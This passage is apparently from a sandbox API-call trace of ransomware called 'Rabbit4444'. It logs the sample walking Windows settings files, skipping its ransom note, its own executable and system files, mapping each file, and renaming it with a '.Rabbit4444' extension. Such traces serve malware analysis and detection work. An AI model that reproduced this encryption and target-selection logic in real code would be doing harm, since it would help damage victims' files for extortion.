lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0057.662] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14897299931) returned 1 [0057.662] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0057.662] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101fb8 | out: hHeap=0xe0000) returned 1 [0057.662] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.662] CloseHandle (hObject=0x298) returned 1 [0057.662] CloseHandle (hObject=0x278) returned 1 [0057.663] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_MultiTasking_AeroSnapEnabled.settingcontent-ms.Rabbit4444") returned 193 [0057.663] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_MultiTasking_AeroSnapEnabled.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_multitasking_aerosnapenabled.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_MultiTasking_AeroSnapEnabled.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_multitasking_aerosnapenabled.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.663] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f78345a, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x2f78345a, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23a287a5, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x508, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_MultiTasking_JointResizeEnabled.settingcontent-ms", cAlternateFileName="AAB1AC~1.SET")) returned 1 [0057.663] lstrcmpiW (lpString1="AAA_SystemSettings_MultiTasking_JointResizeEnabled.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.663] lstrcmpiW (lpString1="AAA_SystemSettings_MultiTasking_JointResizeEnabled.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.663] lstrcmpiW (lpString1="AAA_SystemSettings_MultiTasking_JointResizeEnabled.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.663] lstrcmpiW (lpString1="AAA_SystemSettings_MultiTasking_JointResizeEnabled.settingcontent-ms", lpString2=".") returned 1 [0057.663] lstrcmpiW (lpString1="AAA_SystemSettings_MultiTasking_JointResizeEnabled.settingcontent-ms", lpString2="..") returned 1 [0057.663] lstrcmpiW (lpString1="AAA_SystemSettings_MultiTasking_JointResizeEnabled.settingcontent-ms", lpString2="windows") returned -1 [0057.663] lstrcmpiW (lpString1="AAA_SystemSettings_MultiTasking_JointResizeEnabled.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.664] lstrcmpiW (lpString1="AAA_SystemSettings_MultiTasking_JointResizeEnabled.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.664] lstrcmpiW (lpString1="AAA_SystemSettings_MultiTasking_JointResizeEnabled.settingcontent-ms", lpString2="boot") returned -1 [0057.664] lstrcmpiW (lpString1="AAA_SystemSettings_MultiTasking_JointResizeEnabled.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.664] lstrcmpiW (lpString1="AAA_SystemSettings_MultiTasking_JointResizeEnabled.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.664] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_MultiTasking_JointResizeEnabled.settingcontent-ms" | out: lpString1="AAA_SystemSettings_MultiTasking_JointResizeEnabled.settingcontent-ms") returned="AAA_SystemSettings_MultiTasking_JointResizeEnabled.settingcontent-ms" [0057.664] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_MultiTasking_JointResizeEnabled.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.664] lstrlenW (lpString="AAA_SystemSettings_MultiTasking_JointResizeEnabled.settingcontent-ms") returned 68 [0057.664] lstrlenW (lpString="Rabbit4444") returned 10 [0057.664] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.664] lstrlenW (lpString=".dll") returned 4 [0057.664] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.664] lstrlenW (lpString=".lnk") returned 4 [0057.664] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.664] lstrlenW (lpString=".ini") returned 4 [0057.664] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.664] lstrlenW (lpString=".sys") returned 4 [0057.664] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.664] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_MultiTasking_JointResizeEnabled.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_multitasking_jointresizeenabled.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.665] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.665] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14897536279) returned 1 [0057.665] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1288) returned 1 [0057.665] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0057.665] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101fb8 [0057.665] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x810, lpName=0x0) returned 0x298 [0057.666] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x810) returned 0x70000 [0057.667] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.667] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0057.667] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.667] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0057.667] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.667] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0057.667] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.667] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0057.667] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14897798475) returned 1 [0057.667] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0057.667] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101fb8 | out: hHeap=0xe0000) returned 1 [0057.667] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.667] CloseHandle (hObject=0x298) returned 1 [0057.667] CloseHandle (hObject=0x278) returned 1 [0057.668] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_MultiTasking_JointResizeEnabled.settingcontent-ms.Rabbit4444") returned 196 [0057.668] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_MultiTasking_JointResizeEnabled.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_multitasking_jointresizeenabled.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_MultiTasking_JointResizeEnabled.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_multitasking_jointresizeenabled.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.668] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f842025, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x2f842025, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x239dc2f0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x503, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_MultiTasking_SnapAssistEnabled.settingcontent-ms", cAlternateFileName="AA7060~1.SET")) returned 1 [0057.668] lstrcmpiW (lpString1="AAA_SystemSettings_MultiTasking_SnapAssistEnabled.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.668] lstrcmpiW (lpString1="AAA_SystemSettings_MultiTasking_SnapAssistEnabled.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.668] lstrcmpiW (lpString1="AAA_SystemSettings_MultiTasking_SnapAssistEnabled.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.668] lstrcmpiW (lpString1="AAA_SystemSettings_MultiTasking_SnapAssistEnabled.settingcontent-ms", lpString2=".") returned 1 [0057.668] lstrcmpiW (lpString1="AAA_SystemSettings_MultiTasking_SnapAssistEnabled.settingcontent-ms", lpString2="..") returned 1 [0057.668] lstrcmpiW (lpString1="AAA_SystemSettings_MultiTasking_SnapAssistEnabled.settingcontent-ms", lpString2="windows") returned -1 [0057.668] lstrcmpiW (lpString1="AAA_SystemSettings_MultiTasking_SnapAssistEnabled.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.668] lstrcmpiW (lpString1="AAA_SystemSettings_MultiTasking_SnapAssistEnabled.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.668] lstrcmpiW (lpString1="AAA_SystemSettings_MultiTasking_SnapAssistEnabled.settingcontent-ms", lpString2="boot") returned -1 [0057.669] lstrcmpiW (lpString1="AAA_SystemSettings_MultiTasking_SnapAssistEnabled.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.669] lstrcmpiW (lpString1="AAA_SystemSettings_MultiTasking_SnapAssistEnabled.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.669] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_MultiTasking_SnapAssistEnabled.settingcontent-ms" | out: lpString1="AAA_SystemSettings_MultiTasking_SnapAssistEnabled.settingcontent-ms") returned="AAA_SystemSettings_MultiTasking_SnapAssistEnabled.settingcontent-ms" [0057.669] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_MultiTasking_SnapAssistEnabled.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.669] lstrlenW (lpString="AAA_SystemSettings_MultiTasking_SnapAssistEnabled.settingcontent-ms") returned 67 [0057.669] lstrlenW (lpString="Rabbit4444") returned 10 [0057.669] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.669] lstrlenW (lpString=".dll") returned 4 [0057.669] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.669] lstrlenW (lpString=".lnk") returned 4 [0057.669] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.669] lstrlenW (lpString=".ini") returned 4 [0057.669] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.669] lstrlenW (lpString=".sys") returned 4 [0057.669] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.669] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_MultiTasking_SnapAssistEnabled.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_multitasking_snapassistenabled.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.669] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.669] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14898020986) returned 1 [0057.670] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1283) returned 1 [0057.670] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117a40 [0057.670] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1015a0 [0057.670] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x810, lpName=0x0) returned 0x298 [0057.671] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x810) returned 0x70000 [0057.672] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.672] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0057.672] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.672] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0057.672] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.672] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0057.672] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.672] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0057.672] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14898288662) returned 1 [0057.672] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117a40 | out: hHeap=0xe0000) returned 1 [0057.672] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1015a0 | out: hHeap=0xe0000) returned 1 [0057.672] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.672] CloseHandle (hObject=0x298) returned 1 [0057.672] CloseHandle (hObject=0x278) returned 1 [0057.672] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_MultiTasking_SnapAssistEnabled.settingcontent-ms.Rabbit4444") returned 195 [0057.673] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_MultiTasking_SnapAssistEnabled.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_multitasking_snapassistenabled.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_MultiTasking_SnapAssistEnabled.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_multitasking_snapassistenabled.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.674] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2faa4585, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x2faa4585, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23a287a5, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4f9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_MultiTasking_SnapFillEnabled.settingcontent-ms", cAlternateFileName="AA3E7E~1.SET")) returned 1 [0057.674] lstrcmpiW (lpString1="AAA_SystemSettings_MultiTasking_SnapFillEnabled.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.674] lstrcmpiW (lpString1="AAA_SystemSettings_MultiTasking_SnapFillEnabled.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.674] lstrcmpiW (lpString1="AAA_SystemSettings_MultiTasking_SnapFillEnabled.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.674] lstrcmpiW (lpString1="AAA_SystemSettings_MultiTasking_SnapFillEnabled.settingcontent-ms", lpString2=".") returned 1 [0057.674] lstrcmpiW (lpString1="AAA_SystemSettings_MultiTasking_SnapFillEnabled.settingcontent-ms", lpString2="..") returned 1 [0057.674] lstrcmpiW (lpString1="AAA_SystemSettings_MultiTasking_SnapFillEnabled.settingcontent-ms", lpString2="windows") returned -1 [0057.674] lstrcmpiW (lpString1="AAA_SystemSettings_MultiTasking_SnapFillEnabled.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.674] lstrcmpiW (lpString1="AAA_SystemSettings_MultiTasking_SnapFillEnabled.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.674] lstrcmpiW (lpString1="AAA_SystemSettings_MultiTasking_SnapFillEnabled.settingcontent-ms", lpString2="boot") returned -1 [0057.674] lstrcmpiW (lpString1="AAA_SystemSettings_MultiTasking_SnapFillEnabled.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.674] lstrcmpiW (lpString1="AAA_SystemSettings_MultiTasking_SnapFillEnabled.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.674] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_MultiTasking_SnapFillEnabled.settingcontent-ms" | out: lpString1="AAA_SystemSettings_MultiTasking_SnapFillEnabled.settingcontent-ms") returned="AAA_SystemSettings_MultiTasking_SnapFillEnabled.settingcontent-ms" [0057.674] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_MultiTasking_SnapFillEnabled.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.674] lstrlenW (lpString="AAA_SystemSettings_MultiTasking_SnapFillEnabled.settingcontent-ms") returned 65 [0057.674] lstrlenW (lpString="Rabbit4444") returned 10 [0057.674] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.674] lstrlenW (lpString=".dll") returned 4 [0057.674] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.674] lstrlenW (lpString=".lnk") returned 4 [0057.675] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.675] lstrlenW (lpString=".ini") returned 4 [0057.675] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.675] lstrlenW (lpString=".sys") returned 4 [0057.675] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.675] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_MultiTasking_SnapFillEnabled.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_multitasking_snapfillenabled.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.675] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.675] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14898569209) returned 1 [0057.675] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1273) returned 1 [0057.675] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117a40 [0057.675] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101af0 [0057.675] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x800, lpName=0x0) returned 0x298 [0057.677] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x800) returned 0x70000 [0057.678] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.678] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0057.678] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.678] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0057.678] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.678] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0057.678] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.678] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0057.678] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14898912709) returned 1 [0057.678] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117a40 | out: hHeap=0xe0000) returned 1 [0057.678] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101af0 | out: hHeap=0xe0000) returned 1 [0057.678] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.679] CloseHandle (hObject=0x298) returned 1 [0057.679] CloseHandle (hObject=0x278) returned 1 [0057.679] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_MultiTasking_SnapFillEnabled.settingcontent-ms.Rabbit4444") returned 193 [0057.679] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_MultiTasking_SnapFillEnabled.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_multitasking_snapfillenabled.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_MultiTasking_SnapFillEnabled.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_multitasking_snapfillenabled.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.679] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2fe5e066, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x2fe5e066, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23a74c5a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x500, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_MusUpdate_AdvancedSettingsLink.settingcontent-ms", cAlternateFileName="AA04EB~1.SET")) returned 1 [0057.679] lstrcmpiW (lpString1="AAA_SystemSettings_MusUpdate_AdvancedSettingsLink.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.679] lstrcmpiW (lpString1="AAA_SystemSettings_MusUpdate_AdvancedSettingsLink.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.679] lstrcmpiW (lpString1="AAA_SystemSettings_MusUpdate_AdvancedSettingsLink.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.679] lstrcmpiW (lpString1="AAA_SystemSettings_MusUpdate_AdvancedSettingsLink.settingcontent-ms", lpString2=".") returned 1 [0057.679] lstrcmpiW (lpString1="AAA_SystemSettings_MusUpdate_AdvancedSettingsLink.settingcontent-ms", lpString2="..") returned 1 [0057.680] lstrcmpiW (lpString1="AAA_SystemSettings_MusUpdate_AdvancedSettingsLink.settingcontent-ms", lpString2="windows") returned -1 [0057.680] lstrcmpiW (lpString1="AAA_SystemSettings_MusUpdate_AdvancedSettingsLink.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.680] lstrcmpiW (lpString1="AAA_SystemSettings_MusUpdate_AdvancedSettingsLink.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.680] lstrcmpiW (lpString1="AAA_SystemSettings_MusUpdate_AdvancedSettingsLink.settingcontent-ms", lpString2="boot") returned -1 [0057.680] lstrcmpiW (lpString1="AAA_SystemSettings_MusUpdate_AdvancedSettingsLink.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.680] lstrcmpiW (lpString1="AAA_SystemSettings_MusUpdate_AdvancedSettingsLink.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.680] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_MusUpdate_AdvancedSettingsLink.settingcontent-ms" | out: lpString1="AAA_SystemSettings_MusUpdate_AdvancedSettingsLink.settingcontent-ms") returned="AAA_SystemSettings_MusUpdate_AdvancedSettingsLink.settingcontent-ms" [0057.680] SetFileAttributesW 